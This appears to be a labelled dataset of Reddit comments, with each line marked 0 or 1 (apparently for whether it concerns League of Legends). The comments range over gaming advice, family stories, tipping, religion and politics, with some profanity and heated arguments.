realistic. This worked better when she hadn't already told them about how she cheated on my father. She once asked me if I told her boyfriend and I told her no, but that my father had called earlier and her now ex-boyfriend had picked up the phone. She didn't have the guts to call my father and ask him. She got jealous very easily, so I'd convince her that her boyfriends were cheating on her. This included hiring strippers/escorts online with their credit cards, or paying my friends' college-aged sisters to hit on them at bars. I accidentally hired the same girl twice over the course of a year and that's when she realized what I was up to. Then she snapped.   So we know he isn't young if he is doing this, like what little kid could do this. If he did this 5 years he was under 12. So he would have to be like 13. Furthermore, my parents were recently divorced and they asked where I wanted to go, I said my dads so I live there now. Not saying they blindly let you just say were, but you have influence meaning that he was not opposed to this during the divorce. This all means he started after the divorce, and think when he would be old enough to do these kinds of things, I think he probably would be able to when, at the earliest, he was 13.
0	Please go back to [r/childfree]( Before you start shit, let me just say, I am pro-choice, I do believe that all women have the choice of whether or not to grow a parasite inside of them.   Now, what about circumstance changes? My husband was able to support the three of us on his income, but that was bare minimum surviving, granted we were/are happy; but we had to move a great distance just for us to be able to enjoy extras. I grew up, due to unforeseeable circumstances, in a very poor household where 4 adults and 3 children (including myself) shared a two bedroom apartment just for survival.
1	I would wait until you have a couple hundred normal wins before you play ranked, honestly. It's what all my friends told me to do, but I was to eagar and jumped the gun right into ranked the day I hit 30. I got placed into Bronze 3 (last season), but have managed to climb to Gold 5.Game knowledge, mechanics, and strategy all take quite a while to develop in League, so my advice would just be to wait. Don't screw yourself over and get placed in Bronze like me just because ranked sounds fun.   Also, you should make sure that you're comfortable playing any role before going into ranked, because there will just be some games where you wont get your main and have to go into Support, or wherever. So make sure you have some backup plans if you're last pick and don't get what you wanted :P
1	And youre not a fiora main, youre basicly a fiora-only   I'm not entirely sure what you're communicating with that. I play Fiora more out any champion. I'm a Fiora main? If I only played Fiora, wouldn't I still be a Fiora main?   I think I'm just having a hard time believing that ANYONE wants to go back to the bruiser only Renekton vs Shyvana only meta that was big for a few months. That was literally the most boring thing ever.   I also think that people's perceptions of what is OP or UP are pretty overrated. It's solo que. You're much better off playing what you're good at than what is considered "meta."  I see posts like this all the time on Reddit, so yeah, I'm going to invest some energy in providing an alternative voice to the "meta is broken" circle-jerk: No, it's fine. Stop playing what the pros play, and play what you're good with.   The Bruiser playstyle is about getting in your face and killing you and behing a huge pain in team fights. If there is no room for squishier champions to kite and outplay 1v1, the game gets pretty boring for everyone else. I don't think it's as 1 sided as you claim it is, coming from someone who has seen plenty of bruisers do fine and plenty of bruisers do poorly.
1	not sure if the change was a good idea honestly.  22k viewers (once) isnt that much compared to what they had in own3d.  i dont know the details about the difference of income per viewer between own3d and twitch, but they had almost twice as much viewrs before.   the same can be said about the tournaments, on the last year the playerbase of LoL grow a lot, but the amount of viewers on tournaments like dreamhack dropped.   the best example for this are the tournaments with double stream (ogn, mlg) when the viewers could actually choose where to watch the tournaments.  every single time there was at least twice more viewers on own3d than twitch.   i can understand why, as im one of the viewers that cant watch twitch, so, yes, mine can be a biased pov.
0	I hit my data cap after watching 3 friggin YouTube videos... each 6-7 minutes long, and I was watching at whatever resolution iPhone 4 has..   Called Bell royalty/retention department, made some threats to move to Wind, and mother f*ckers immediately added 500MB and 500minutes.   Happy ending? NOOO, stories with telcos never end happily. They ended up charging me for some random shit that they never told me about.
1	No see, you are here bashing on someone who just started a new job. I wouldnt have said shit if you provided some constructive critizism, instead you just just bash him. Its not so nice to throw words like "retard" and "prick" around, especially when you are being as hypocritical as you are. You opinion doesnt really matter btw, you dont decide weather he stays casting, or if he gets a paycheck, riot does. And if you think all the whining you guys do about him will change that, just take a look at what all the skarner re-work whiners got for their troubles... Not a damn thing.
0	Unless you're feeling particularly gaseous and would rather just get it out all at once.  One time, I didn't release it all, so during sex when it was just getting good, I ended up farting every other thrust.  I started laughing, she started hitting me while telling me not to stop, which only made me laugh more.  All the while, though I was hoping these were only going to be farts, I had to not only focus on her, but focus on making sure I don't gamble with a fart and lose.
1	anyone with good mobility like corki is a good pick into teams with a lot of cc.  As much as it sucks to accept, you're not going to win every game, sometimes you just can't carry the game. I play mid lane and what I like my bot lane to do (if they get an advantage) is to take their tower, then come mid and take the mid tower.  This rotation takes a minute or two to pull off and once you have the mid tower down, SO much of the map opens up.  It also allows me to roam and try to get other lanes ahead.   Don't know man
0	Would living away from home have done that or would you have done poorly regardless? I lived at home the entire time I was in college. I got poor grades my first year at college. After that I got my shit together and by my Junior/ Senior years there were very few people in my majors that outperformed me. I'm not saying you wouldn't have done better away from home, but it is a combination of innumerable factors that make up what we do and why. What makes you do what you do and think how you think cannot simply be placed to one thing like not going away for school or for another example being poor. It would have certainly affected who you are today though.   Could you have done better living on your own during school? Sure you could. Could you have ended up worse? Sure you could. Although it is very easy to say I did X because of Y the reality just isn't so simplistic. What makes you who you are and who you will become is a mess of ever growing prior experiences, your perception of those experiences, and those perceptions impact on your perception of future experiences. Some things will have a bigger impact on making you who you are than others but ultimately why you do what you do comes down to an impossible number of factors to even fathom and beyond that stating I did X because of Y will always at least be partially incorrect. Also there is the issue of blaming an external factor rather than a personal one that could be worked in with this issue, or a discussion of consequentialist reasoning, but I think I have been boring enough already.
1	I wouldn't be so bold as to claim to know when he's absolutely good or bad, but I will say confidently that he plays better with teams that are very mobile themselves and self sufficient. Ez/jayce/tf kind of comps. Since his strong point is split pushing, it's better to play with a team with good wave clear/disengage who won't get dove and killed 5v4 or even a team that can push a lane while you're pushing another.  I could confidently add that he's weak against good dive teams for the same reason since it makes split pushing difficult if they 5v4 your team.  As mentioned he's also poor against high cc teams. See my earlier post for details a few unit's above.   In terms of laning phase, I won't play him against champions who are early beasts usually because even though he comes back hard in mid game, getting there is often challenging in early laning phase.  Sometimes I'll start with a Fortitude Elixer and try to grab the early advantage with a bait.  If you're curious about counters in lane, I'd say I pretty much agree with what's on championselect.net (There are two darius' in there for a reason, think of their ulti's lol). Katerina's not in that list, but I'd add her simply because his ulti makes hers COMPLETELY useless and his even lasts significantly longer.
0	Major chain grocery stores vary their prices all over Australia too, often in the same city depending on socio - economic factors, yet all price tags list the price including sales tax. They also tend to list tho price per volume for easy comparison (not sure if you have that in the states too).
1	Agreed. I recently turned on all-chat again though, and guess what, nowadays my team mates are doing most of the raging, in regular chat. Guess they realized that all-chat is turned off by default now so they don't get the response they want when they rage there.
1	Here's a conversation]( I had with Riot Lyte on a similar issue. I've gotten 4 permabanned accounts for toxicity, and people really underestimate how difficult it can be for some people to "Just stop raging". It's not that simple.
0	How about looking at how often each of those cases happens (hint: generally the passing on the right is less often). Or you could consider that the person on the right lane that got frustrated with you was probably there because someone like you (if not you) didn't move right, so he had to go there to get around you. Then there's the fact that if you're going to be damned if you do and damned if you don't, you could at least piss off the guy that was trying to do the illegal passing.   If everyone has your attitude, there will still be lots of problems. If people didn't have a "well fuckit, I'll just be a dick" attitude, then maybe that guy wouldn't have gone right to pass to begin with. If everyone doesn't have your attitude, then you wouldn't be damned if you do and damned if you don't. You're only damned if you do because of you and people like you. Be part of the solution, not the problem.
0	At what point is it the responsibility of the customer to have ownership for your job choice in which you agree to be paid the wages of said establishment?   I'm all for tipping on good service, and understand the server doesn't cook my food, but I'm not responsible for how many tables you didn't get all week, nor the table that walked on a tab and you being short in your paycheck. Being in service myself, some tend to be entitled - treating customers like shit because they "don't want to be at work" then bitch cause they didn't get a good tip.   If you aren't making enough consistently as a server, the problem isn't your customer - it's your poor budgeting/job choice. If you need X to survive, then find a job that gives you X as your paycheck.
0	i was that kid in school, it's not fun realising you have developed some sort of habit of pathological lying, and consequentially spent a number of years in and out of depression desperately trying to right it, forcing myself to tell the truth no matter what and apologising directly after telling someone a lie. the worst part is when you begin to live within your lies in your head in order to get away from the reality they have brought you.   really, there may be more to it than meets the eye and it's a very depressing struggle trying to prove to people that you can in fact be trusted. sometimes i wonder who worked me out and which lies are still believed.   Edit;
1	Yeah I reported someone for being boosted like 2 months ago and guess what? The fucker has his rewards and isn't banned.
0	It's a very debatable point because there are different translations into English for the various passages that seem to address this. Many of these have difficult to translate words and concepts that require historical context that can make the issue more complicated to learn or teach about.   The most commonly used passage historically was Sodom and Gomorrah, but that story simply didn't say that at all. Angels were almost raped, yes, but rape is a sin regardless of sexuality, also the attempt was  after  the city had been judged for destruction, and finally, the issue of Sodom's sin was addressed in Ezekiel as being a lack of compassion for the less fortunate despite having resources in abundance.   The most commonly used passage in modern times is Leviticus, which (translation issues aside, and they exist) was a passage meant to be for those who wish to enter the Lord's temple and/or take part in temple rituals. They would have  never  applied to non-Jewish people, and just like eating shellfish and wearing mixed fabrics, they don't apply to Christians now.   The passages in Paul's letters that are sometimes used to say homosexuality is a sin are more complicated. Notably, some of them say "sexual perversion" and so the reader's own prejudices against homosexuality are the only reason to apply them that way.   Others have translations saying they actually referred to temple prostitutes and were a condemnation of the sex trade industry. Notably Paul seems to have coined the word "arsenokoitai" himself. It literally is the Greek words meaning "male" and "bed" put together. It is often translated to mean men who have sex with men, but Greek already had equivalent words that were well known. Paul was a man who prided himself on writing his letters so that the common man would understand them, and not be full of esoteric words and give off an attitude of being too important to deal with the masses (like so many priests he'd seen in his time). If that word means homosexuals like so many say, it's a needless word. Making up new words without need seems like a contradiction to Paul's afforementioned character trait.   There's also the question of Paul's authority. He may have been an important figure in the bible, but there are Christians who question whether this authority was enough to declare something a sin that wasn't stated to be a sin anywhere else in biblical texts. Or whether that authority cleared him from making human mistakes related to his understanding of human sexuality (which opens the "is the bible infallible?" can of worms).   The most important thing to take away from this is that there are interpretations of the bible that allow homosexuality, and very good arguments in favor of them. In modern society if someone treats it as moot that homosexuality is a sin, they are most likely unaware of or purposefully ignoring these counter-arguments. There are a very large number of people out there willing to ignore, lie about, or misrepresent these arguments because it serves their beliefs or purposes to treat pro-gay vs. anti-gay as the same argument of atheist vs. Christian.
1	It's becoming significantly harder to even jungle with her, usually I get the scuttle crab and go gank/counterjungle, but even if you do it right you can get absolutely shat on by a lower health jungler with no items or a mid laner with a bit more exp.   This if of course nobody fed and you're making the first aggressive move, it doubles when one or several lanes fed and ask for ganks putting the blame on you, you're behind, you can't deal damage, your teammates aren't cooperating and trying to surrender.
1	That's possible. I've been gaming since the mid 90s on PC and since the 80s on consoles. I've also been a heavy PC user for well over 20 years.   A few years ago I started to develop a pain in my left wrist area (around the tendons), as well as stiff and sore joints in my hands, especially my index and middle finger. Between long office hours (programmer) and all the extra time gaming, I figured that it was between CTS and the early stages of rheumatoid arthritis which runs in my family.   Anyhow, around this time I had just gotten into weight training. I noticed within the first month that my hands didn't ache nearly as much, and that the joint stiffness was almost gone too. I decided to apply the training directly to my hands.   I bought my first set of Captains of Crush hand grips (.5) and used them every other day (the knurling is rather rough on the hands at first) but I can close the .5 (120lbs) like nothing else. After using these for a while, the pain is completely gone and my grip strength is far better. I was already deadlifting a lot more than that but it applies differently when you're directly closing just 1 hand on it. I also started using the hand bands they sell and I've been pain and stiffness free for a long time.
0	Ok so i might have exaggerated the 60kg lifts. Theyre all machine lifts on their own but we have product like gun safes that need two or more ppl to lift. We have a system that gives you a specific time for weights, distance, shift length etc. All based on safe weight limits and working procedures. If they cant hit 100% theyre an obese mess or lazy as fuck.
1	I recommend the Solomid-guide by Dyrus (I think). Even tho its for 5's, the Coreitems are the same. For myself, I figured 2 startings with singed.   1) Regrowth Pendant+Pot-> double Philo/Boots-> Catalyst -> Rylias-> Tanky items ( FrozenHeart/Banshees/FoN)   2) ManaCrystal-> Catalyst/Boots -> Negatron/Chainmail (depending on enemy) -> Rylias -> Tanky   The first path is for 3's too slow (in my opinion) so i usually go with the second one. If u get farmed and/or fed you can throw a Deathcap somewhere in there for extra dmg.   Boots/Catalyst/ Rylais is really all you need. You have decent health(passive), permanent slow with your Q+ Rylais and you can farm/harrass/gank a lot withouthaving to bluepill too much because of the Catalyst. Your low-CD Ulti gives you all the resistances you need early-midgame.
0	I still disagree.  There are certain things that really fall outside the range of expectation. If I'm a middle school teacher and I notice that NASA overspent it's budget, I can criticize them for that, admonish them not to do it again, and move forward. It's not my job to go "here are some possible ways to avoid it in the future."   Same thing with the banking industry. Not everyone can have a solution. That's sort of why we vote for elected officials. So that we don't have to spend all that time thinking of ways to solve our problems. For better or worse it's allowed people to be focused more personally than on the nations politics. We support those who have ideas and the passion to attempt them.   Finally, telling someone to "google it" is not helpful. Not in the slightest. I mean, in general, when I tell someone to Google it, it's an act of annoyance. Not one of benevolent "here's how you can fix it."   Oh, in regards to the mechanic. Yeah that might be nice. That's a good example of when it's really necessary to specific about criticism (of an object) and potential to fix it. I hadn't thought of that.   I guess the point I'm making is that criticism plays a central role in development of novel ideas. People respond to being told their ideas, projects, or plans "aren't good enough." A willingness to voice criticism is essential to progression and, while nice if present, a "how to improve" isn't necessary or required and making it so would only reduce the presence of much needed criticism.
1	Tryndamere, Yi, Sivir, Quinn, Warwick, Jarvan, Janna, Ezreal, Zilean, and Soraka.  Summoners are either Revive/TP or Heal/TP.  Don't bother fighting, because the other team will probably have a super AOE team.  Instead, just focus on splitpushing and/or backdooring.  Warwick, Jarvan, Sivir, and Ezreal all have huge teamwide AS buffs (for a total of +132% at max level if the team is together) allowing them to take towers extremely quickly.  Soraka and Janna can make a single person very tanky, especially if they go AP.  Because their team likely consists of squishy AOE casters, if only a few of them come to defend the tower you can try to dive them with WW/J4 tanking the tower (assisted by Zilean and/or Janna and/or Soraka) for your AD champions.   Essentially, once all your TPs are up you can just 10-man push a tower.  If all/most of their team is there then TP to a conveniently placed ward in the opposite lane and take that tower.  If that AOE team pushes a lane, there is almost no chance you will be able to hold that tower if they have a few poke champions, so just outmanuever them and make every push into a base race that you will win.
1	I've been playing since s1 and didn't play ranked until this season >.> had something like 1500-2k total games before doing ranked. I guess I was plenty experienced because I was placed mid silver(right before the switch to the current League system) and went from Silver 3 - Gold 5 pretty easily playing only support with the occasional Rammus jungle.
0	My bike was stolen from my stairwell in the block I live in whilst I was on holiday even though it was secured. Called the police and took my statement. Apparently a neighbour saw someone walk out with it and looked up toward my flat and waved as if they were borrowing the bike from me. Sneaky bastards. A week later I got a call informing me that the case is closed as there is no real evidence of the bike being stolen. Bar from the fact ITS NO LONGER THERE, cant do anything about it. Insurance company wont pay out as it wasn't in my flat. Pisses me off but cant let it stress me out.
1	I get raging when my team refuses to work together, otherwise I'm pretty calm. I play Jax/Yi, and usually carry around 20/3/5 at the moment. When we're working together really well, talking to eachother, my scores go up to around 25-30/1-2/10-15. If I'm going 4v1 blocking a middle rush, with no turrets, my scores go down to around 10/10/3 (Sometimes with a win at those scores, belive it or not.)
1	you know, the problem with adc is, the kda and the gpm is'nt only the  achievement of the adc-player, everyone covers up their adc , because its the most important role in the teamfight, most toplaner etc build completly tanky and deal zero dmg , so ofc its the adc who gets the most gold/kills.   is there any adc we "hate"? rekkles,doublelift, turtle, we all call them godlike players with godyl mechanics while its most often also the succes of the team.
0	I can't see how anyone could look down on someone for doing a job that has to be done, yet no one really wants to do it. No matter the job, if the worker is doing their job to the best of their ability, then they shouldn't be judged by anyone. Meanwhile, a person that just "goes through the motions" should be treated like crap. I'm not saying you have to act like the job is the best thing to do ever, but making a half assed attempt for whatever reason is awful. No matter the field of work an individual is in, if you accept to do a job, do the job as necessary.
1	i dont know but i cant hate name if she bubble me it just look so sweet and you can get an good overview
1	Bad supports are horrible to lane with but a win is doable from a adc point of view. The other way not so much.  I am just a gold pleb support but I can still play reasonably well against a bad matchup. From experience I saw that even if I play really poor, that one magic ability I land towards end game can win us the game, although a adc that's doing really poorly can not have that one magical ability at the right time and win because adc's need to do what they are intended to do: kill shit from the back line.   They depend too much on items and positioning to be a workable factor even when behind with a average team, where as supports don't rely that much on items (2 of them pretty much) and positioning is a smaller requirement when all you have to do is just hit a skill or two to win that team fight.   I know people will come and say "as a support you should focus on peeling or assisting the guy who's carrying you, not the adc who went 420yolomode in lane and lost it", that's the most logical thing anyone would do but what happens when there isn't that one guy who could carry with my assist?
0	My mom was married very young to my father who she had no feelings for. My grandparents basically intimidated her into marrying him at 18. She had never had a boyfriend before. He beat her and almost stopped my birth by pushing her on to a table while she was pregnant.   My mom divorced him much to my grandparent's displeasure. She never dated anyone else after that. She met my step dad at a club and they became friends. Just friends, no romantic connection. My grandparents didn't like him. They thought she should be out finding a marriageable man instead of spending time with friends. In a fit of rage she lied to them, telling them she was in love with him. She carried on this charade for months without his knowing. Finally, she told him that why she had been acting weird. He didn't understand that she was just lying to my grandparents so they'd leave her alone, so being the big hearted idiot that he is, he proposed. Being a 19 year old immature girl with STILL no relationship experience, she married him. My mom, dad, and stepdad are from Mexico. But from different parts. My mom and dad have the same colloquialism, and habits. My step-dad has different colloquialism, and because of that somethings he would say to me in Spanish I did not understand AT ALL. Imagine being yelled at by a someone with a completely different world view and jargon for something you don't understand. Many times I was slapped or spanked because I honestly couldn't understand what my step-dad wanted from me. My mom refused to listen to my complaints. I always felt as though I could, at any minute, be hit because I didn't understand his wording. Not until I was a sophomore in high school did my mom do anything about it. She suddenly believed my stories and used those as grounds for divorce. I thought that my life would actually be normal. No. My mom decided that it was time for her to finally live-out what she missed as teenager. I was expected to have straight A's, be apart of after-school activities, have a job, cook dinner, clean the house, and whatever else my mom wanted. So, after school I'd go to work until 6 (mom got home at 5) come home, clean the house, cook dinner, do homework, research for my speeches and debates, then I had free time.  I started dating a girl that lived an hour or so away so the only chance we'd see each other was on weekends or summers when I didn't have school or speech. On weekends, my mom would leave town right after work and not come back until mid day Sunday so I had to watch my brother and sister. My now fiancee, being as awesome as she is, would drive an hour to visit me, help me watch the kids for the weekend, and stay with us. Once I turned 18 and graduated high school, I left. I was gone as quickly as possible. It's not fun having an immature parent.   (
1	As a new player, I am trusting yall that the smurfing stops (or at least get managable after lvl 10). I personaly know of two users who have started and quit due to smurfing.   The big problem is it is rewarded*. Lets say your main account gets leaver buster blocked. You create an alt with the refer a friend. Play alt to level 5. get bonus IP/XP boosts for your main. I shall call this the smurfing bonus.   Then you have people like me, Newbs who want to learn. Only chance I get to be around other new players is in private games with freinds (most of who quit due to smurfing....) There is no learning curve just a cliff.   I know it gets better after 10, but from here it can't be seen. Thanks for reading this wall of text.
0	You're right. I think a 50/50 split would the most fair, but let's be honest, the United States could not give less of a fuck about it's gifted and talented children. There were only 7.5 million dollars (the Michael K. Javitz fund I believe) set aside for G&T children at the federal level, and even that was scrapped when no child left behind was implemented. The problem (to me) is lumping all the two extremes of the spectrum together into "special needs", when they should certainly be separate entities. Also, the way NCLB is set up, schools practically have to ignore G&T kids and throw all the funding at kids with disabilities so that they don't fail the standards that NCLB sets for schools to secure their already meager funding. It also varies state by state. For example, my home state of New York is godawful about this, not mandating that students be serviced, or even identified as G&T.
0	On a side note, i have a degree in Communications with an emphasis in Public Relations. I graduated 6 weeks ago and have had 1 interview while applying for numerous jobs. I have 3+ years in the communications field.
0	You do know what the correct way to make chicken stock (or any stock for that matter) is to boil the bones with water once, then throw away that first stock, right? And then you boil the second stock, pour water and boil the bones. Then you have the right kind of stock.
0	It's absolutely ridiculous. Mark Cuban is not a stupid man. If Mark Cuban had prejudiced feelings, towards any race, he would NOT come out and say it, in light of the current situation. He's not defending Sterling, and he's not say that he is a racist himself. He's explaining human nature. And I believe him 100%. I believe we all make judgements, and perhaps some of them are prejudiced.   While we're on the topic, this is going to set a precedent. If Sterling is out, and Mark Cuban releases another statement, he could be next. Just like the whole Washington Redskins ordeal. Harry Reid, who has many important issues to deal with, is spending his time leading a group of 50 Senators to try and force the Redskins to change their 'offensive' name. And yes, it's not the most PC name, but why is today the day that it suddenly became unbearable? And if they change their name, the Braves will have to, the Fighting Irish will have to stop using the name, and every high school in America who uses a name that could possibly be SLIGHTLY offensive to ANY group, not just Native Americans, will have to change their name.
0	I've got another perspective for you...   It's no secret that you are supposed to drive far enough behind the next vehicle that no matter what they do, no matter how it happens, you can always stop safely without hitting them or anything else.  In fact, its law.  It's law because that shit is dangerous.  If you break that law, you are very clearly endangering other peoples' lives.  If a guy driving a truck takes it upon himself to brake in front of you to show you why you should be following the rules of the road, he is potentially saving future lives while teaching you an important lesson and not endangering anyone else.   Who knows what kind of grisly accident this asshole would have caused in the future had he not been taught to pay the fuck attention?   "But this guy's not God!  He's at least equally an asshole for causing the accident!"   Did he really cause it?  Had a child run out into the road, or another car pulled out in front of the truck, the same result would have occurred.  The only reason this man hit the truck is because he was breaking the rules.
1	I agree, and feel like TRM...may or may not get a lot of unnecessary hate on Reddit a lot of the time (not that everyone doesn't, but still). He wears his emotions on his sleeve like a lot of people do, Oce is a good example, and is another of the players either loved of hated on a every other day basis.   Being emotional isn't always a bad thing either, and there are people like that in every part of life. NBA fans either else love or hate Kevin Garnett, a very vocal emotional player who is generally liked by everyone on his team...and not so much by his opponents. But he has won a MVP and lead teams to titles regardless.
0	Since no one has said this, time for me to chirp in. I've noticed something of a trend for universities. Those who have to work hard in high school (and generally get a lower gpa because of it) but get the time management and study skills from high school tend to do much better at University. Conversely, those that do good without trying tend to not do as well and have issues with the freedom and time management that goes along with the environment. Mind you there are exceptions (or outliers sorry I'm in a field with a lot of statistics), but it seems to be the general trend. And now I would want to see the data on that...   Edit: I looked up a paper that looked at test scores as well as high school GPA. They say that high school GPA has more to do with placement that testing. They found rather low levels of correlation for the testing compared to the high school GPA (R2 ranging from 0.02 to 0.25 for testing compared to about 0.35 for GPA. Not great but okay R2 values)   For performance, they showed a 0.6 drop in GPA between HS and College. However, only ~20% of the variation in GPA.   Source:
0	You don't really have to, but when you do its totally worth it, and only you realize it.   Sounds an AWFUL lot like [this]( to me...   (Just speaking in general here, I am not qualified to speak on car mods.)   [Edit: Full disclosure: Someone stuck a "PS3 sucks compared to the 360" in there so I edited it to make the example more abstract.
0	There actually used to be a term called "second sleep" and it referred to something which is now called ["segmented sleep."](  Basically people used to sleep from sundown until about 1 or 2am, then wake up for an hour or two, and then go back to sleep until dawn.   I hadn't even heard of this until my husband and I went on a cruise and had an interior cabin.  We had no window, so no sunlight to tell us if it was daytime or not.  We were also on vacation, so didn't bother with things like alarm clocks.  We were travelling with family, and they would wake us up when they were ready to go do stuff, since they had kids and needed more time to get ready than we did.  When we got back on the ship in the evening, we were pretty worn out, so usually we went to bed around 8pm, and every night without fail we woke up between 1 and 3am, and went up to walk the decks for an hour or so, then went back to bed and slept until our family members called us to get ready.  When we got back home again, I started doing some research into why this happened, and discovered segmented sleep.  A lot of tribal communities still experience this, and they use the time in the middle of the night to stoke the fire, work on crafts, or have sex.
1	It does...in the laning phase. Something really well played like Blitzcrank and Poppy or Blitzstar, Jarvan and Leona, etc....  They are all really strong agains the AD Carry + Support bot lane, especially if the AD Carry has a low mobility. However, if the enemy bot lanes plays this matchup good and doesnt let you snowball early on, the enemy team will probably have an advantage in mid to late game, just because they have this AD Carry. I think If u do double bruiser bot you will definitely need an AD Carry top lane.
0	I find these two to be inherently at odds, whether you intend them that way or not. You're not identifying my as my 'new' (or as it is to me, my 'true') gender, but rather as a trans person of that gender. It's a subtle but important distinction which means all the difference in the world. You seem like a pretty polite person, so I don't want to put words in your mouth, but the suggestion isn't too far removed from the common statement that a post-transition man/woman is not a real man/woman, but a facsimile thereof.   Here tends to be the crux of the disagreement between our two views. If my interpretation is correct, to feel truly accepted transwomen/men need to be accepted as an option for a mate as like any other member of that gender. While I understand where this desire comes from, I don't feel that it is reasonable to expect people to be willing to accept something that is at odds with their sexual preference. It feels invasive. While I am truly bothered by the fact that there is no way to appease both sides of this issue, I am reminded that often time in nature in life, things aren't always balanced and fair. Many men feel that when they impregnate a woman, decisions regarding its abortion should be discussed equally between the two genders. But a women's body is her own and can make sexual and reproductive choices. I believe that all human beings have this right to their own choices regarding these matters and if somebody doesn't not want to have an intimate relationship with a trans person is their prerogative.   I am sorry that there is not a way to appease both sides of this issue as I realize that it is something that could help the mental health of many tradespeople. It is important that you feel accepted and I will make every effort to ensure that they feel that acceptance from me. But when it comes down to my sexual desires and mates I cannot ignore what my brain and soul are telling me as much as you can go throughout your life living as the wrong gender. If you can realize that your brain is speaking your personal truth when it tells you that you are in the wrong gender, how can you expect me to ignore the voice that tells me that a transperson is not the right mate for me. I have no problem letting people live the way they want to live until they expect me to change my sexual preferences to accommodate them. I see how you may need this sexual validation to prove to yourself you are finally home in the right body and I am sorry that I cannot give that to you.   >Let's propose a different hypothetical situation; a woman is born in a female body (A cis woman), and she develops normally. However, in her teens, a tragic car accident effectively destroys her birth-given genitalia. A miracle procedure is tried on her, for the first time; a 'donor' womb and genitalia are transplanted to her, restoring the functionality lost in the accident. Would you have qualms about dating such a woman, even though she possessed genitals that were different but functionally identical from those she was born with?   Honestly, no. It is not the fact that there was genital surgery involved that makes the woman an inviable candidate. It is the gender from birth that I am concerned with. You may try to denounce me now because I have said that. But I don't think its an unfair thing to say. As sexual being I am filtering the environment for many things, both conscious and subconscious when selecting a mate. Its within my right to respectfully discriminate between people I would like to have an intimate relationship with.   >Suffice it to say, for some persons in transition, our definition of a given gender IS your definition of a gender, by necessity.   I am sorry. I am sorry that your self esteem throughout this struggle is so strongly tied to my criteria for mate selection. I wish there was a way to have a happy ending for everyone. But I cannot lie to myself. The same way I don't expect you to lie to yourself. You desperately want to be accepted in all aspects of that gender and my right to decide whats best for my sexual life is the last barrier to you. I am sorry, but I cannot change that fundamental aspect of what I'm looking for in life so that you can sleep easier. I would be lying to myself and the transwoman, wasting both of our time.   >we can easily take your messages to mean you don't accept our gender in any sense at all   You can always take offence even when none was given, thats true. But I feel I really do except you in every reasonable way. It’s the only area where I can't accept a trans is as my sexual partner. If, from that, you extrapolate that I do not accept your gender in any sense at all, I'm sorry. I disagree, of course, but I am still sorry.   <Irrational Rant Response>:   >but when we get to the point where you wouldn't even know if we didn't tell you, and you're still getting sticky about it, fuck off, man. >if you start getting selective about when you consider us 'true' men or women, when you're in a situation where you wouldn't even know if we didn't tell you? That's not being accepting, that's being a judgemental douche...   Well I still maintain that asking a person to scrap their personal sexual preferences so that you don't have to address that you were once the opposite gender is over the line. It must be terribly hard to BE your gender while simultaneously acknowledging the transformation to sexual partners repeatedly. I understand that you are trying to BE your gender identity. But you need to understand that people have a right to select their own sexual partners. You said that nobody is implying that you have to do anything, but you are saying that they are being a judgemental douche by making the choice to not sleep with a woman because she used to be a man. Thats unfair. Its a bullying tactic.   As for the "if we didn't tell you" comment. I think thats such a shameful way to go about your life. Does this apply to only trans operations? What about marital status when you're at a bar? Is a woman being a judgmental douche by deciding not to become intimate with a married man? What about having an STI? I mean yeah they will catch it but they wouldn't absolutely know that you gave it to them if you didn't tell them you had it. Is this what you're trying to defend? Directly lying or lying through omission to deprive someone of the information you know is very likely criteria for them to select their partners? To use this lack of communication to lure someone into making a decision that they will (or could) regret later on? This sounds like the thought process of a sexual predator. The old "what they don't know won't hurt them" argument. It is my belief that a person has a right to be made aware of these details before entering into a sexual relationship with you. I am sure you disagree, but C'est la vie.   **</Rant Response>
1	You know what I find funny?  You actually had gotten mad because I disproved your point on racism. Unfortunately this is the only way you deal with being wrong is acting like the child you are.  I suppose people in game like yourself are my frustration at times, you think you are clever or funny, maybe even smart or tough through the internet but the fact is you are just a sad little boy with nothing better to do with his time.   I know I am typing a lot for you, but I assure you that my couple paragraphs took just as long as it had taken you to type "keep typing".   You enjoy doing your little spam of one phrase "meme's" at people like "seems legit"   , "pro tip" while never actually putting forth any effort to give constructive criticism.   In fact every time you reply even though I know you are not reading these (no ability to sit still for 10 seconds without your meds) I take great joy and pride from it.  Its kind of like having a dog that can do back flips on command, while yours friends dog is 7 and still chews the corner of the coffee table :).   Here I am you -   "No one wants to see your shitty stream"  Seems you get angry that people post their streams for league.. Kind of shows what a kid you are doesnt it?  Seems you spend more time telling people they have shitty streams than contributing anything to "any" part of society.. You cannot even contribute on the internet.
1	You just have to play the Champion Selection smart. If you dont ban Kassadin, you can be sure as hell the enemy team will ban him. Just use the enemy team's bans for you, and if you ban like mundo, kassa and fizz but dont want them to play shyvana just pick her, there are many people out there who want to play her either top or jungle if you dont want to play her.
1	Only people who jelly of you're 1500 don't understand how bad people are at 1500. That's the source of the downvotes. I made a comment a while ago about how decent players only start becoming the majority in the game in 1700+ brackets, and even then not by much.
0	God, some redditors are total dicks. Fuck you downvoters. My content is awesome and you can suck my dick. Downvote this! See if I give a shit. You can take your mouse click of negativity and go play a game of fuck off. I, and everyone else on the internet hope you die for being such massive assholes. You're the reason we can't have nice things. You're the reason we have trolls. You're the reason your IRL friends don't invite you to social events and never respond to you on facebook. Picture of a dog..."FUCK THAT I HATE DOGS DOWNVOTE DOWNVOTE DOWNVOTE" You are the cancer of the internet, the butthole of society, the blemish on the ass of an otherwise hopeful world. You are human garbage. Now go, go look at my previous posts and click away asshats. Take away my worthless internet points because it will make your pathetic, negative, bullshitty existence feel more important.
0	believing religion should influence politics   80% of people in the US identify as having a religious affiliation. While laws should not be made only because of religion, they should be made to best represent the people in the country. Completely ignoring 80% of people's beliefs and way of life does not count as representing the people in the country.   >women should not have control of their own bodies   This subject is not black and white. Allowing all abortions isn't necessarily the ultimate answer, even though you may believe it to be so, other people believe otherwise. Heck, I'm an atheist and still do not agree with 90% of pro-choice issues. Yes, Romney said he would glady sign a bill banning all abortions. BUT he continued on by saying that the governement is not at that point. Personally, if it were up to him, he would. He does however realize that it is not the overwhelming majority of Americans who agree. He is seperating his personal beliefs from what is best for the country as a whole.   >gay marriage   Yes, there are some points that I do not agree with. I support gay marriage, Romney doesn't. I hardly think that it is an important issue in this day and age though. I believe that fixing the economy is infinitely more important than worrying about whether same-sex couples can have the status of "married" or not. In fact, even among straight couples there are less and less marriages. The whole concept is slowly getting phased out of our system as the world becomes more atheist, since it is traditionally a religious ceremony.
